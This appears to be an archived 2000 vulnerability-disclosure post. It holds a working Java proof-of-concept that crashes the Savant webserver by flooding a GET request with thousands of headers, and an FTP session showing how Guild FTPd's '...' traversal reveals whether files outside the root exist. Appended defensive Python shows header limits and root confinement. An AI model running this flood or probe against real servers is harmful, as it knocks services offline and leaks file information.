gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd

2000-07-10 00:00:00, vulners.com

Yo,

Errr… Sorry about saying gnu-pop3d had the same problem as FTGate -
don't know how that got in my list - I assume from posting after a rather
hectic party and before that vital cup of coffee the next day. :)
Apologies, all.

Anyway, I found a stack overflow in the Savant webserver the other day -
lemmee just paste the code I wrote here…

/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 *
 * Written by Wizdumb <[email protected] || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server receives too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 * Registers:
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

    public static void main(String[] args) throws IOException {

        if (args.length != 1) {
            System.out.println("Syntax: java savantstack [hostname/ip]");
            System.exit(1);
        }

        Socket soq = null;
        PrintWriter white = null;

        int i = 5000; // This should do fine :-)

        soq = new Socket(args[0], 80);
        white = new PrintWriter(soq.getOutputStream(), true);

        System.out.print("Showing " + args[0] + " the phj33r :P ...");
        white.print("GET /index.html HTTP/1.0");
        for (int x = 0; x < i; x++) white.println("A:A");
        white.println("\n");
        System.out.println("Done!");

        white.close();
        soq.close();
    }
}

That's it. I also found a more minor vulnerability in Guild FTPd -
although directory traversal with GET can't be used to d/l files outside
of the FTP root directory, it can be used to see if files exist. An
example follows…

C:\wizdumb>ftp localhost
Connected to kung-phusion.
220-GuildFTPD FTP Server (c) 1999
220-Version 0.93i
220 Please enter your name:
User (kung-phusion:(none)): test
331 User name okay, Need password.
Password:
230 User logged in.
ftp> cd ...
550 Access denied.
ftp> get .../nonexistant.txt
200 PORT command successful.
550 Access denied.
ftp> get .../autoexec.bat
200 PORT command successful.
150 Opening ascii mode data connection for \.../autoexec.bat (1143 bytes).
425 Download failed.
ftp> quit
221 Goodbye. Control connection closed.

The SIZE command can also be used in a similar manner.

Anyway, I'm outta here again…

Cheers,
Andrew Lewis aka. Wizdumb [MDMA]

[email protected]
www.mdma.za.net/fk
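The Savant crash above is the classic result of a server accumulating request headers without any bound. The following is an added example, not code from the post or from Savant, showing the defensive side: an HTTP/1.0 request-head parser that enforces a header count limit, a per-line limit and a total size limit before doing any per-header work. The limit values, the function names (parse_request, make_request, accepts) and the sample request built by make_request are all constructed for this example.

```python
"""Bounded HTTP/1.0 request-head parser (added example, not from the original post).

The limits below are constructed for the example; real servers pick similar
values. The point is that every limit is checked before the parser touches
the individual headers, so a client sending thousands of header lines is
rejected early instead of filling a fixed-size buffer.
"""
from dataclasses import dataclass, field

MAX_HEADERS = 100          # constructed: maximum number of header lines accepted
MAX_LINE_BYTES = 8192      # constructed: maximum length of any single line
MAX_REQUEST_BYTES = 64 * 1024  # constructed: maximum size of the whole request head


class RequestRejected(ValueError):
    """Raised when a request head breaks a limit or is malformed."""


@dataclass
class Request:
    method: str
    target: str
    version: str
    headers: dict = field(default_factory=dict)


def parse_request(raw: bytes) -> Request:
    """Parse a raw request head, enforcing size and count limits first."""
    if len(raw) > MAX_REQUEST_BYTES:
        raise RequestRejected("request head exceeds MAX_REQUEST_BYTES")
    # The head ends at the first blank line; accept CRLF or bare LF endings.
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, _body = raw.partition(b"\n\n")
    if not sep:
        raise RequestRejected("request head not terminated by a blank line")
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    # Count check comes before any per-line work: this is the check Savant lacked.
    if len(lines) - 1 > MAX_HEADERS:
        raise RequestRejected("too many headers: %d > %d" % (len(lines) - 1, MAX_HEADERS))
    for line in lines:
        if len(line) > MAX_LINE_BYTES:
            raise RequestRejected("line exceeds MAX_LINE_BYTES")
    parts = lines[0].decode("ascii", errors="replace").split(" ")
    if len(parts) != 3:
        raise RequestRejected("malformed request line")
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.decode("latin-1").partition(":")
        if not colon or not name.strip():
            raise RequestRejected("malformed header line")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, version, headers)


def make_request(header_count: int) -> bytes:
    """Build a constructed GET request carrying header_count copies of 'A: A'."""
    lines = [b"GET /index.html HTTP/1.0"] + [b"A: A"] * header_count
    return b"\r\n".join(lines) + b"\r\n\r\n"


def accepts(raw: bytes) -> bool:
    """True if the parser accepts the request head, False if it is rejected."""
    try:
        parse_request(raw)
        return True
    except RequestRejected:
        return False


if __name__ == "__main__":
    print("10 headers accepted:", accepts(make_request(10)))
    print("5000 headers accepted:", accepts(make_request(5000)))
```

A request with a handful of headers parses normally; one carrying 5000 header lines, the shape the proof-of-concept sends, is rejected at the count check without any per-header allocation. Note that repeated "A: A" lines collapse to a single dictionary key, so the header dictionary itself never grows with the number of duplicate lines.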
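The Guild FTPd session above leaks information because a path outside the root that does not exist gets "550 Access denied." straight away, while one that does exist gets a 150 before the transfer fails. The following is an added example, not code from the post or from Guild FTPd, showing how a server can confine every path argument to its root and answer the outside-root and non-existent cases identically, so that neither RETR nor SIZE can be used as an existence probe. The function names (resolve_within_root, ftp_retr_reply, demo), the reply strings and the temporary directory layout are constructed for this example.

```python
"""FTP root confinement with a uniform error reply (added example, not from the original post).

The directory layout built by demo() is constructed: an FTP root containing
pub/readme.txt, and a file autoexec.bat placed one level above the root.
"""
import tempfile
from pathlib import Path


class PathDenied(Exception):
    """The requested path is outside the FTP root or does not exist."""


def resolve_within_root(root: Path, cwd_rel: str, requested: str) -> Path:
    """Resolve `requested` (relative to cwd_rel inside root, or to root if it
    starts with '/') and return the real path, or raise PathDenied if the
    resolved path escapes the root.

    Containment is tested on the fully resolved path, so '..', '...',
    backslashes and symlinks are all handled by the same check.
    """
    root = root.resolve()
    # Treat backslashes as separators so a Windows-style argument gets the same checks.
    cleaned = requested.replace("\\", "/")
    # A drive-letter prefix (C:...) can never be inside the root; refuse it outright.
    if ":" in cleaned.split("/")[0]:
        raise PathDenied(requested)
    base = root if cleaned.startswith("/") else root / cwd_rel
    candidate = (base / cleaned.lstrip("/")).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise PathDenied(requested) from None
    return candidate


def ftp_retr_reply(root: Path, cwd_rel: str, requested: str) -> str:
    """Model the control-channel reply to RETR (constructed reply text).

    'Outside the root' and 'does not exist' collapse to the same 550 reply,
    so the reply cannot be used to tell whether a file exists.
    """
    try:
        target = resolve_within_root(root, cwd_rel, requested)
        if not target.is_file():
            raise PathDenied(requested)
    except PathDenied:
        return "550 File unavailable."
    return "150 Opening data connection for %s (%d bytes)." % (requested, target.stat().st_size)


def demo() -> dict:
    """Build the constructed layout and exercise the four interesting cases."""
    base = Path(tempfile.mkdtemp())
    root = base / "ftproot"
    (root / "pub").mkdir(parents=True)
    (root / "pub" / "readme.txt").write_text("hello")
    (base / "autoexec.bat").write_text("@echo off")   # exists, but outside the root
    return {
        "inside": ftp_retr_reply(root, "pub", "readme.txt"),
        "absolute_inside": ftp_retr_reply(root, "pub", "/pub/readme.txt"),
        "traversal_existing": ftp_retr_reply(root, "pub", "../../autoexec.bat"),
        "traversal_missing": ftp_retr_reply(root, "pub", "../../nonexistent.txt"),
        "dotdotdot": ftp_retr_reply(root, "pub", ".../autoexec.bat"),
        "drive_letter": ftp_retr_reply(root, "pub", "C:\\autoexec.bat"),
    }


if __name__ == "__main__":
    for name, reply in demo().items():
        print("%-20s %s" % (name, reply))
```

The file inside the root gets its 150 reply; the existing file above the root, the non-existent file above the root, the "..." form and the drive-letter form all get the identical "550 File unavailable.", so a client learns nothing from the difference. A SIZE handler would use the same resolve_within_root check and the same uniform 550 for the failing cases.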